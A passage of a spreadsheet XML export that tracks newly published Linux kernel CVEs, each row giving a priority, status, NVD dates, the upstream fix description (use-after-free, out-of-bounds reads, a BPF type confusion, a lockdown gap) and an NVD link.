3. teardown destroys and NULLs       3. the callback flushes or queues
   o2net_wq.                            work through o2net_wq.</t>
        </is>
      </c>
      <c r="T670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90302</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90303</t>
        </is>
      </c>
      <c r="D671" s="5" t="inlineStr"/>
      <c r="E671" s="5" t="inlineStr"/>
      <c r="F671" s="5" t="inlineStr"/>
      <c r="G671" s="5" t="inlineStr"/>
      <c r="H671" s="5" t="inlineStr"/>
      <c r="I671" s="5" t="inlineStr"/>
      <c r="J671" s="5" t="inlineStr"/>
      <c r="K671" s="5" t="inlineStr"/>
      <c r="L671" s="5" t="inlineStr"/>
      <c r="M671" s="5" t="inlineStr"/>
      <c r="N671" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O671" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P671" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q671" s="5" t="inlineStr"/>
      <c r="R671" s="5" t="inlineStr"/>
      <c r="S671" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ARM: 9485/1: mm: acquire mmap write lock around show_pte() for user faults
When CONFIG_DEBUG_USER=y, and cmdline "user_debug=31" is set,
a user fault may trigger show_pte() without any lock.
If another thread in the same process concurrently calls munmap(),
the page table pages may be freed while show_pte() is still traversing
them, causing a use-after-free in show_pte().
If CONFIG_ARM_LPAE=y, this may cause a kernel panic if the pages table
of PMD are freed when show_pte() is running.
Acquire mmap_write_lock() around show_pte() for user faults to fix the
contention.
For user faults, additionally restrict that show_pte() is called only
when the addr is a user-space address (addr &lt; TASK_SIZE). This is because
the lock of tsk-&gt;mm only protects the virtual memory of user address space,
furthermore, dumping the page tables of a kernel-space address for user
faults is unnecessary and may have security implications.
Keep everything unchanged for kernel faults, because the kernel is
already in the "oops" state, acquiring a lock may risk a deadlock.</t>
        </is>
      </c>
      <c r="T671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90303</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90304</t>
        </is>
      </c>
      <c r="D672" s="5" t="inlineStr"/>
      <c r="E672" s="5" t="inlineStr"/>
      <c r="F672" s="5" t="inlineStr"/>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="inlineStr"/>
      <c r="I672" s="5" t="inlineStr"/>
      <c r="J672" s="5" t="inlineStr"/>
      <c r="K672" s="5" t="inlineStr"/>
      <c r="L672" s="5" t="inlineStr"/>
      <c r="M672" s="5" t="inlineStr"/>
      <c r="N672" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O672" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P672" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q672" s="5" t="inlineStr"/>
      <c r="R672" s="5" t="inlineStr"/>
      <c r="S672" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ARM: 9484/1: enable interrupts when unhandled user faults are triggered
PREEMPT_RT requires interrupts to be enabled when sending signals.
When do_DataAbort()/do_PrefetchAbort() triggers unhandled user faults,
that is `inf-&gt;fn()` return a non-zero value, and the interrupts are not
enabled within the hook function, force_sig_fault() will be called
with interrupts disabled.
This can be triggered by user programs executing the bkpt instruction,
with kernel config CONFIG_PERF_EVENTS=n.
Enable interrupts in do_DataAbort()/do_PrefetchAbort() when unhandled
user faults are triggered to fix the issue.</t>
        </is>
      </c>
      <c r="T672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90304</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90305</t>
        </is>
      </c>
      <c r="D673" s="5" t="inlineStr"/>
      <c r="E673" s="5" t="inlineStr"/>
      <c r="F673" s="5" t="inlineStr"/>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="inlineStr"/>
      <c r="I673" s="5" t="inlineStr"/>
      <c r="J673" s="5" t="inlineStr"/>
      <c r="K673" s="5" t="inlineStr"/>
      <c r="L673" s="5" t="inlineStr"/>
      <c r="M673" s="5" t="inlineStr"/>
      <c r="N673" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O673" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P673" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q673" s="5" t="inlineStr"/>
      <c r="R673" s="5" t="inlineStr"/>
      <c r="S673" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ARM: 9483/1: select HAVE_POSIX_CPU_TIMERS_TASK_WORK
Commit c6e61c06d606 ("ARM: 9463/1: Allow to enable RT") enabled PREEMPT_RT
on ARM but did not select HAVE_POSIX_CPU_TIMERS_TASK_WORK. This leaves
CONFIG_POSIX_CPU_TIMERS_TASK_WORK disabled, so CPU timers expire in hard
IRQ context.
On PREEMPT_RT this makes run_posix_cpu_timers() take the sleeping
sighand-&gt;siglock:
  BUG: sleeping function called from invalid context at spinlock_rt.c:48
    rt_spin_lock from lock_task_sighand
    lock_task_sighand from run_posix_cpu_timers
    run_posix_cpu_timers from update_process_times
ARM handles TIF_NOTIFY_RESUME on all return-to-user paths, including v7-M.
ARM32 KVM host support was removed by commit 541ad0150ca4 ("arm: Remove
32bit KVM host support"), so the select need not be conditional on KVM.
Select it to defer POSIX CPU timer expiry to task context.
Reproduced with setrlimit(RLIMIT_CPU, ...) and a busy loop. The same path
is used by setitimer(ITIMER_PROF or ITIMER_VIRTUAL) and POSIX CPU timers
created with timer_create().</t>
        </is>
      </c>
      <c r="T673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90305</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90306</t>
        </is>
      </c>
      <c r="D674" s="5" t="inlineStr"/>
      <c r="E674" s="5" t="inlineStr"/>
      <c r="F674" s="5" t="inlineStr"/>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="inlineStr"/>
      <c r="I674" s="5" t="inlineStr"/>
      <c r="J674" s="5" t="inlineStr"/>
      <c r="K674" s="5" t="inlineStr"/>
      <c r="L674" s="5" t="inlineStr"/>
      <c r="M674" s="5" t="inlineStr"/>
      <c r="N674" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O674" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P674" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q674" s="5" t="inlineStr"/>
      <c r="R674" s="5" t="inlineStr"/>
      <c r="S674" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ARM: 9481/2: breakpoint: CFI breakpoints only on demand
This removes the stub hw_breakpoint_cfi_handler() from ARM, making
it not steal breakpoint type 0x03 (ARM_ENTRY_CFI_BREAKPOINT) unless
CFI is actively used in the kernel.
When not instrumenting with CFI, or when a breakpoint is issued in
userspace, we fall through to return 1 from hw_breakpoint_pending()
"unhandled fault" so userspace can make use of this breakpoint.
Tested with LKDTM and this command line:
echo CFI_FORWARD_PROTO &gt; /sys/kernel/debug/provoke-crash/DIRECT
still works as expected.</t>
        </is>
      </c>
      <c r="T674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90306</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90307</t>
        </is>
      </c>
      <c r="D675" s="5" t="inlineStr"/>
      <c r="E675" s="5" t="inlineStr"/>
      <c r="F675" s="5" t="inlineStr"/>
      <c r="G675" s="5" t="inlineStr"/>
      <c r="H675" s="5" t="inlineStr"/>
      <c r="I675" s="5" t="inlineStr"/>
      <c r="J675" s="5" t="inlineStr"/>
      <c r="K675" s="5" t="inlineStr"/>
      <c r="L675" s="5" t="inlineStr"/>
      <c r="M675" s="5" t="inlineStr"/>
      <c r="N675" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O675" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P675" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q675" s="5" t="inlineStr"/>
      <c r="R675" s="5" t="inlineStr"/>
      <c r="S675" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/srp: fix heap information leak on a truncated SRP_CRED_REQ
srp_recv_done() passes wc-&gt;byte_len to srp_process_rsp(). It passes
nothing to srp_process_cred_req() and srp_process_aer_req(), which read
fixed-size fields from the receive buffer without checking that those
fields were received.
The buffer size is max_ti_iu_len, which comes from the login response
and is not validated. A target that advertises 8 and then sends an
8-byte SRP_CRED_REQ makes the initiator read req-&gt;tag from beyond the
end of the buffer. req-&gt;tag is copied into the SRP_CRED_RSP and sent
back, so those bytes reach the target. SRP_AER_REQ behaves the same way
and also reads req-&gt;lun.
The leak is 8 bytes per response. max_ti_iu_len also decides which slab
cache the buffer comes from. With 8 the buffer is a kmalloc-8 object and
the read is entirely outside it:
  BUG: KASAN: slab-out-of-bounds in srp_recv_done+0x172b/0x1aa0
  Read of size 8 at addr ffff888104714da8 by task kworker/u8:3/50
   which belongs to the cache kmalloc-8 of size 8
  The buggy address is located 0 bytes to the right of
   allocated 8-byte region [ffff888104714da0, ffff888104714da8)
Without KASAN the returned bytes are whatever is next in the slab. One
run returned ".strtab".
rsp-&gt;data[3] in srp_process_rsp() has the same problem: only
resp_data_len is checked before it is read.
Drop a request that is shorter than the structure being parsed, and
check byte_len before the tsk_mgmt read.</t>
        </is>
      </c>
      <c r="T675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90307</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90308</t>
        </is>
      </c>
      <c r="D676" s="5" t="inlineStr"/>
      <c r="E676" s="5" t="inlineStr"/>
      <c r="F676" s="5" t="inlineStr"/>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="inlineStr"/>
      <c r="I676" s="5" t="inlineStr"/>
      <c r="J676" s="5" t="inlineStr"/>
      <c r="K676" s="5" t="inlineStr"/>
      <c r="L676" s="5" t="inlineStr"/>
      <c r="M676" s="5" t="inlineStr"/>
      <c r="N676" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O676" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P676" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q676" s="5" t="inlineStr"/>
      <c r="R676" s="5" t="inlineStr"/>
      <c r="S676" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/erdma: Hold QP references for AE and CM processing
AE QP fatal events and iWARP CM paths load QPs from dev-&gt;qp_xa
and then use or reference them outside the xarray lock.
erdma_destroy_qp() can drop the destroy-path reference and free QP
resources while such a lookup is in flight.
Add erdma_qp_get_by_qpn() to acquire a kref under the xarray
lock with kref_get_unless_zero(). Remove the QP from the xarray
before dropping the destroy-path reference so no new lookup can acquire
it while destruction waits for existing users.</t>
        </is>
      </c>
      <c r="T676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90308</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90309</t>
        </is>
      </c>
      <c r="D677" s="5" t="inlineStr"/>
      <c r="E677" s="5" t="inlineStr"/>
      <c r="F677" s="5" t="inlineStr"/>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="inlineStr"/>
      <c r="I677" s="5" t="inlineStr"/>
      <c r="J677" s="5" t="inlineStr"/>
      <c r="K677" s="5" t="inlineStr"/>
      <c r="L677" s="5" t="inlineStr"/>
      <c r="M677" s="5" t="inlineStr"/>
      <c r="N677" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O677" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P677" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q677" s="5" t="inlineStr"/>
      <c r="R677" s="5" t="inlineStr"/>
      <c r="S677" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/erdma: Hold CQ references when processing EQ events
EQ handlers look up CQs from dev-&gt;cq_xa and invoke CQ completion or
error callbacks outside the xarray lock. erdma_destroy_cq() can erase the
CQ from the xarray and free its queue buffer and doorbell record while a
previously scheduled EQ handler is still using the CQ.
Add a CQ refcount and take a reference under the xarray lock with
refcount_inc_not_zero(). Remove the CQ from the xarray before dropping
the destroy-path reference, then wait for in-flight EQ users before
releasing CQ resources.</t>
        </is>
      </c>
      <c r="T677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90309</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90310</t>
        </is>
      </c>
      <c r="D678" s="5" t="inlineStr"/>
      <c r="E678" s="5" t="inlineStr"/>
      <c r="F678" s="5" t="inlineStr"/>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="inlineStr"/>
      <c r="I678" s="5" t="inlineStr"/>
      <c r="J678" s="5" t="inlineStr"/>
      <c r="K678" s="5" t="inlineStr"/>
      <c r="L678" s="5" t="inlineStr"/>
      <c r="M678" s="5" t="inlineStr"/>
      <c r="N678" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O678" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P678" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q678" s="5" t="inlineStr"/>
      <c r="R678" s="5" t="inlineStr"/>
      <c r="S678" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xen/xenbus: check otherend_id only after it has been initialized
When device just got initialized (for example on module load), the
otherend_id field is initialized only after
xenbus_read_otherend_details() gets called. If xenstore watch triggers
xenbus_dev_changed() before that, it might consider still zeroed
otherend_id field (not matching actual xenstore content) as a sign of
device state reset. It can happen because xenstore watch are handled in
another thread (xenwatch), which can run in parallel to the initial
device probe running at module load. In that case, it would call
device_unregister(), which would deadlock against device probe from
module init.
Fix this by considering dev-&gt;otherend_id change only after dev-&gt;otherend
is set (which happen after otherend_id is initialized).</t>
        </is>
      </c>
      <c r="T678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90310</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90311</t>
        </is>
      </c>
      <c r="D679" s="5" t="inlineStr"/>
      <c r="E679" s="5" t="inlineStr"/>
      <c r="F679" s="5" t="inlineStr"/>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="inlineStr"/>
      <c r="I679" s="5" t="inlineStr"/>
      <c r="J679" s="5" t="inlineStr"/>
      <c r="K679" s="5" t="inlineStr"/>
      <c r="L679" s="5" t="inlineStr"/>
      <c r="M679" s="5" t="inlineStr"/>
      <c r="N679" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O679" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P679" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q679" s="5" t="inlineStr"/>
      <c r="R679" s="5" t="inlineStr"/>
      <c r="S679" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
thermal: hwmon: Remove hwmon class device along with its parent
The current code creates one hwmon device per thermal zone type and that
device is registered under the first thermal zone of the given type.
That turns out to be problematic when the thermal zone holding the
hwmon device is removed.
For example, say that there are two ACPI thermal zones on a system
 /sys/devices/virtual/thermal/thermal_zone0/
 /sys/devices/virtual/thermal/thermal_zone1/
The current code registers a hwmon class device for thermal_zone0 only:
 /sys/devices/virtual/thermal/thermal_zone0/hwmon0/
because the type is "acpitz" for both of them, but it adds a sysfs
attribute that belongs to thermal_zone1 under it:
 /sys/devices/virtual/thermal/thermal_zone0/hwmon0/temp2_input
There is also
 /sys/devices/virtual/thermal/thermal_zone0/hwmon0/temp1_input
which belongs to thermal_zone0.
When thermal_zone0 is removed, say because the ACPI thermal driver is
unbound from the underlying platform device, thermal_remove_hwmon_sysfs()
skips the removal of hwmon0 because of the temp2_input attribute
belonging to thermal_zone1 which effectively prevents thermal_zone0
removal from making progress.
Address this by making thermal_remove_hwmon_sysfs() remove the entire
hwmon class device interface for the given thermal zone type when the
thermal zone device holding it is removed.
To prevent races with thermal_add_hwmon_sysfs() that may interfere
with this, carry out the entire addition and removal of hwmon sysfs
interfaces for thermal zones under thermal_hwmon_list_lock.
Also adjust the layout of the labels in thermal_add_hwmon_sysfs() to
the current kernel coding style to align with the new "unlock" label.</t>
        </is>
      </c>
      <c r="T679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90311</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90312</t>
        </is>
      </c>
      <c r="D680" s="5" t="inlineStr"/>
      <c r="E680" s="5" t="inlineStr"/>
      <c r="F680" s="5" t="inlineStr"/>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="inlineStr"/>
      <c r="I680" s="5" t="inlineStr"/>
      <c r="J680" s="5" t="inlineStr"/>
      <c r="K680" s="5" t="inlineStr"/>
      <c r="L680" s="5" t="inlineStr"/>
      <c r="M680" s="5" t="inlineStr"/>
      <c r="N680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O680" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P680" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q680" s="5" t="inlineStr"/>
      <c r="R680" s="5" t="inlineStr"/>
      <c r="S680" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Check load-acquire src ptr type before the load
check_atomic_load() calls check_load_mem() before atomic_ptr_type_ok().
For a load-acquire that fetches into its own source register (dst_reg ==
src_reg), check_load_mem() overwrites src_reg's type with the type of the
loaded value, so the subsequent atomic_ptr_type_ok() no longer sees the
source pointer and fails to reject the disallowed types (ctx, pkt,
flow_keys, sock).
Since bpf_convert_ctx_accesses() does not rewrite atomic loads, the raw
access to the underlying kernel object is left in place. The destination
type is taken from the ctx access itself, so a load-acquire of the sk
field of struct __sk_buff for example leaves the register typed as
PTR_TO_SOCK_COMMON_OR_NULL, which type_is_sk_pointer() does not match
either, while it actually holds unconverted struct sk_buff bytes. Once
the NULL check has passed this is a type confusion, not just a leak of
kernel data.
Validate src_reg with check_reg_arg() and check the source pointer type
with atomic_ptr_type_ok() before the load again, mirroring
check_atomic_rmw(). Out-of-range register numbers are already rejected
earlier by check_and_resolve_insns() (commit 503d21ef8eac ("bpf: Do
register range validation early")), and the only exemption there,
is_stack_arg_ldx(), requires BPF_LDX | BPF_MEM | BPF_DW and thus never
matches a BPF_ATOMIC insn. atomic_ptr_type_ok() can therefore not
dereference register state out of bounds, that is, the out-of-bounds
read addressed by the Fixes commit below does not reappear (as proven
also via selftest).</t>
        </is>
      </c>
      <c r="T680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90312</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90313</t>
        </is>
      </c>
      <c r="D681" s="5" t="inlineStr"/>
      <c r="E681" s="5" t="inlineStr"/>
      <c r="F681" s="5" t="inlineStr"/>
      <c r="G681" s="5" t="inlineStr"/>
      <c r="H681" s="5" t="inlineStr"/>
      <c r="I681" s="5" t="inlineStr"/>
      <c r="J681" s="5" t="inlineStr"/>
      <c r="K681" s="5" t="inlineStr"/>
      <c r="L681" s="5" t="inlineStr"/>
      <c r="M681" s="5" t="inlineStr"/>
      <c r="N681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O681" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P681" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q681" s="5" t="inlineStr"/>
      <c r="R681" s="5" t="inlineStr"/>
      <c r="S681" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, cgroup: Fix invalid storage access after __cgroup_bpf_attach failed
A potential invalid storage access issue can occur after replacing a
cgroup bpf prog.
This occurs in the following scenario:
1. prog1 with storage is attached to a cgroup in multi-attach mode.
2. prog1 is replaced with prog2 using BPF_F_REPLACE in multi-attach
   mode, but fails midway (e.g. in bpf_trampoline_link_cgroup_shim or
   update_effective_progs).
3. A new prog3 is attached to the cgroup in multi-attach mode.
The reason is that __cgroup_bpf_attach overwrites pl-&gt;storage with the
new storage prior to attachment completion. When attachment fails
midway, the cleanup path calls bpf_cgroup_storages_free(new_storage) to
free the newly allocated storage, but fails to restore pl-&gt;storage back
to old_storage.
Consequently, the still-active prog1 holds invalid or dangling storage
pointers, leading to an invalid memory access when prog1 executes and
calls bpf_get_local_storage. Additionally, original pl-&gt;flags and
cgrp-&gt;bpf.flags[atype] are left unrestored.
Fix this by saving old_pl_flags, old_storage, and old_flags prior to the
update, and properly restoring all of them in the cleanup path on error.</t>
        </is>
      </c>
      <c r="T681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90313</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90314</t>
        </is>
      </c>
      <c r="D682" s="5" t="inlineStr"/>
      <c r="E682" s="5" t="inlineStr"/>
      <c r="F682" s="5" t="inlineStr"/>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="inlineStr"/>
      <c r="I682" s="5" t="inlineStr"/>
      <c r="J682" s="5" t="inlineStr"/>
      <c r="K682" s="5" t="inlineStr"/>
      <c r="L682" s="5" t="inlineStr"/>
      <c r="M682" s="5" t="inlineStr"/>
      <c r="N682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O682" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P682" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q682" s="5" t="inlineStr"/>
      <c r="R682" s="5" t="inlineStr"/>
      <c r="S682" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
remoteproc: fix OOB read via signed offset in rsc_table_for_each_entry()
table-&gt;offset[i] is a u32 from firmware, but was stored into a signed
int.  A crafted offset like 0xFFFFFFF0 becomes -16, placing hdr 16 bytes
before the table buffer.  The subsequent avail check was bypassed
because the negative int was promoted to a large size_t in the
expression "table_sz - offset - sizeof(*hdr)", yielding a large positive
avail and letting the out-of-bounds hdr-&gt;type read proceed undetected.
Store the offset as u32 and validate it with unsigned comparisons before
any pointer arithmetic.</t>
        </is>
      </c>
      <c r="T682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90314</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90315</t>
        </is>
      </c>
      <c r="D683" s="5" t="inlineStr"/>
      <c r="E683" s="5" t="inlineStr"/>
      <c r="F683" s="5" t="inlineStr"/>
      <c r="G683" s="5" t="inlineStr"/>
      <c r="H683" s="5" t="inlineStr"/>
      <c r="I683" s="5" t="inlineStr"/>
      <c r="J683" s="5" t="inlineStr"/>
      <c r="K683" s="5" t="inlineStr"/>
      <c r="L683" s="5" t="inlineStr"/>
      <c r="M683" s="5" t="inlineStr"/>
      <c r="N683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O683" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P683" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q683" s="5" t="inlineStr"/>
      <c r="R683" s="5" t="inlineStr"/>
      <c r="S683" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI/sysfs: Add lockdown checks to legacy I/O and memory handlers
Currently, the legacy I/O and memory sysfs handlers do not check
security_locked_down(LOCKDOWN_PCI_ACCESS), leaving the legacy_io and
legacy_mem files unprotected when the kernel is locked down.
Commit eb627e17727e ("PCI: Lock down BAR access when the kernel is locked
down") added the check to pci_write_config(), pci_mmap_resource(), and
pci_write_resource_io() to prevent userspace from programming DMA-capable
hardware that could be used to modify kernel code, but did not cover the
legacy handlers.
As a result, root can still write arbitrary I/O ports and map the legacy
I/O and memory spaces while the kernel is locked down, which is the same
capability the lockdown is meant to remove.
Add the same check to pci_write_legacy_io(), pci_mmap_legacy_mem(), and
pci_mmap_legacy_io().
These generic handlers cover both architectures that define HAVE_PCI_LEGACY
(such as Alpha and PowerPC).
[bhelgaas: add Link]</t>
        </is>
      </c>
      <c r="T683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90315</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90316</t>
        </is>
      </c>
      <c r="D684" s="5" t="inlineStr"/>
      <c r="E684" s="5" t="inlineStr"/>
      <c r="F684" s="5" t="inlineStr"/>
      <c r="G684" s="5" t="inlineStr"/>
